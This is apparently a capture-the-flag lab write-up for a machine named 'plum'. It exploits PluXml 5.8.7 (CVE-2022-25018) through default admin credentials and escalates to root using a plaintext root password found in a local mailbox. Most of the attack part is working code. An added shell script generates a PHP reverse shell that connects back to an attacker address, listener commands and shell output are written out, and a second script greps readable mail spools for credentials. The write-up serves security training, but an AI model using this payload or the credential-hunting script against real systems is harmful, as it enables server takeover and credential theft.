Machine Info

Spoiler
This lab demonstrates exploiting a Remote Code Execution (RCE) vulnerability in PluXml v5.8.7 (CVE-2022-25018) by injecting a PHP payload into a static page through the admin editor, reached with default credentials. Privilege escalation is achieved by reading the www-data user's mailbox in /var/mail, where the root password has been sent in plain text. The lab highlights default credentials, authenticated code injection through a CMS editor, and privilege escalation through credential disclosure.

User

Reconnaissance

We are going to start by running our nmap scan:

ports=$(nmap -p- --min-rate=1000 -T4 $VICTIM | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

Running second nmap scan with open ports: 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-12 19:00 CET
Nmap scan report for $VICTIM
Host is up (0.029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: PluXml - Blog or CMS, XML powered !
|_http-server-header: Apache/2.4.56 (Debian)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PluXml CMS

We see the CMS. Let's do a bit of enumeration before looking it up online for exploits. The footer links to the admin page, and the default credentials get us in.

Admin creds
admin:admin

Logged in as admin we can see the CMS version, PluXml 5.8.7. Looking it up online we find CVE-2022-25018. A public exploit exists, along with instructions for exploiting it manually, which is what we will do. The static-page editor stores page content as a PHP file that is included when the page is rendered, so anything placed inside <?php ?> tags runs server-side as the web server user. The exploit works by:

  1. Login as Admin
  2. In the Admin menu select static page and edit one
  3. Insert the PHP code there with the relevant tags <?php ?>
  4. Save changes and view the page for the code to execute
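A minimal version of the step 3 payload, as an added example rather than the Ivan Sincek shell the write-up pastes: the shell function below emits a PHP proc_open reverse shell wrapped in the <?php ?> tags the static-page editor needs, and lints it with php -l when a local php binary exists. The attacker address 10.10.14.5 and port 4444 are assumptions.

```shell
#!/bin/sh
# Added example (not code from the original write-up). Emits a minimal PHP
# reverse shell wrapped in <?php ?> tags, ready to paste into the PluXml
# static-page editor. Attacker host/port below are assumptions.

make_php_revshell() {
    host="$1"
    port="$2"
    # \$ keeps the PHP variables literal; $host and $port are substituted by sh.
    cat <<EOF
<?php
// Connect back to the listener and give it an interactive /bin/sh,
// with stdin/stdout/stderr of the shell all wired to the socket.
\$sock = fsockopen("$host", $port);
if (\$sock === false) { exit("connect failed"); }
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
proc_close(\$proc);
?>
EOF
}

# Lint the generated payload with php -l when a local php binary is available,
# so a typo is caught before it is saved into the CMS. Returns 0 when php is absent.
check_payload_syntax() {
    if command -v php >/dev/null 2>&1; then
        make_php_revshell "$1" "$2" | php -l >/dev/null
    fi
}

# Usage: write the payload to a file, start the listener, then paste the file's
# contents into the static page, save, and request the page in a browser.
#   make_php_revshell 10.10.14.5 4444 > payload.php
#   penelope -i tun0 -p 4444        # or: nc -lvnp 4444
make_php_revshell "${1:-10.10.14.5}" "${2:-4444}"
```

The proc_open form is used instead of the `exec("/bin/sh -i <&3 >&3 2>&3")` one-liner because it does not depend on the socket landing on file descriptor 3, which is not guaranteed under every SAPI.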

We are going to use the PHP reverse shell payload by Ivan Sincek, found on Revshells.

Tip
For the listener we are going to use penelope, a reverse-shell handler with some useful automation, such as upgrading the session to a PTY as soon as the callback arrives.

After visiting the static page we get our callback.

└─$ penelope -i tun0 -p 4444
[+] Listening for reverse shells on $ATTACKER:4444 
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from plum~$VICTIM-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /home/kali/.penelope/sessions/plum~$VICTIM-Linux-x86_64/2026_03_12-19_19_11-210.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
www-data@plum:/var/www/html$ 
www-data@plum:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
...
www-data@plum:/$ cd /var/www
www-data@plum:/var/www$ ls -al
total 16
drwxr-xr-x  3 root     root     4096 Aug 25  2023 .
drwxr-xr-x 12 root     root     4096 Aug 25  2023 ..
drwxr-xr-x  8 www-data www-data 4096 Aug 25  2023 html
-rw-r--r--  1 www-data www-data   33 Mar 12 13:58 local.txt

That gives us a shell as www-data, and local.txt is sitting in /var/www.

Root

Mail

We ran linpeas as usual, but our own enumeration also shows an SMTP service listening on port 25. It is bound to 127.0.0.1 only, so it is a local MTA for delivering mail between local users rather than something reachable from outside. The Process column is empty for it because ss can only show process details for sockets owned by our user.

ss -tlnp
State       Recv-Q      Send-Q           Local Address:Port           Peer Address:Port      Process
LISTEN      0           128                    0.0.0.0:22                  0.0.0.0:*          users:(("sshd",pid=569,fd=3))
LISTEN      0           20                   127.0.0.1:25                  0.0.0.0:*

A local MTA means local mail spools, so we look at /var/mail, where linpeas flagged a mailbox for the www-data user. The directory is setgid with group mail, and the www-data file is mode 660 owned by www-data, so our shell can read it.

1
2
3
4
5
6
www-data@plum:/tmp$ cd /var/mail
www-data@plum:/var/mail$ ls -al
total 16
drwxrwsr-x  2 root     mail 4096 Mar 12 14:42 .
drwxr-xr-x 12 root     root 4096 Aug 25  2023 ..
-rw-rw----  1 www-data mail 4563 Mar 12 14:42 www-data

Reading the mail, we find the root password sent in plain text.

Root's password
www-data@plum:/var/mail$ cat www-data 
From root@localhost Fri Aug 25 06:31:47 2023
Return-path: <root@localhost>
Envelope-to: www-data@localhost
Delivery-date: Fri, 25 Aug 2023 06:31:47 -0400
Received: from root by localhost with local (Exim 4.94.2)
        (envelope-from <root@localhost>)
        id 1qZU6V-0000El-Pw
        for www-data@localhost; Fri, 25 Aug 2023 06:31:47 -0400
To: www-data@localhost
From: root@localhost
Subject: URGENT - DDOS ATTACK"
Reply-to: root@localhost
Message-Id: <E1qZU6V-0000El-Pw@localhost>
Date: Fri, 25 Aug 2023 06:31:47 -0400

We are under attack. We've been targeted by an extremely complicated and sophisicated DDOS attack. I trust your skills. Please save us from this. Here are the credentials for the root user:  
root:6s8kaZZNaZZYBMfh2YEW
Thanks,
Administrator

With those credentials we switch to root, and that is the box.
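The mailbox check generalised, as an added example that is not part of the original write-up: a small shell script that lists every local mail spool the current user can read and greps it for credential-shaped lines. The spool paths are the usual defaults; the test below runs it against a constructed mbox file rather than the box's real spool.

```shell
#!/bin/sh
# Added example, not from the original write-up. After landing as www-data,
# list the local mail spools the current user can read and grep them for
# credential-looking lines, the way root's password turned up in
# /var/mail/www-data (mode 0660, owner www-data, group mail).

# Print every regular, readable file in the given spool directories.
# Defaults cover the classic mbox spools; $HOME/Maildir keeps messages in
# cur/ and new/, so those are scanned too when present.
readable_mailboxes() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for f in "$dir"/* "$dir"/cur/* "$dir"/new/*; do
            [ -f "$f" ] && [ -r "$f" ] && printf '%s\n' "$f"
        done
    done
    return 0
}

# Print lines that look like credentials: a user:secret pair on its own line
# (secret at least 8 non-space chars) or any mention of password/credential.
# Mail headers ("From: ...") have a space after the colon, so they do not match.
grep_mail_creds() {
    grep -nE '^[A-Za-z_][A-Za-z0-9_.-]*:[^[:space:]]{8,}$|[Pp]assw(or)?d|[Cc]redential' "$1"
}

# Walk the spools and report hits per mailbox. Returns 0 even when nothing is
# found, so it can be dropped into an enumeration script run under set -e.
hunt_mail_creds() {
    [ $# -gt 0 ] || set -- /var/mail /var/spool/mail "${HOME:-/nonexistent}/Maildir"
    readable_mailboxes "$@" | while IFS= read -r box; do
        hits=$(grep_mail_creds "$box" || true)
        [ -n "$hits" ] || continue
        printf '== %s ==\n%s\n' "$box" "$hits"
    done
    return 0
}

# Usage: hunt_mail_creds            # scan the default spools
#        hunt_mail_creds /var/mail  # or name the directories to check
hunt_mail_creds "$@"
```

The user:secret pattern is deliberately narrow (a bare name, a colon, then eight or more non-space characters to end of line) so that mbox headers like `Message-Id:` and `Delivery-date:` do not flood the output; the keyword match catches the surrounding context, such as "Here are the credentials for the root user".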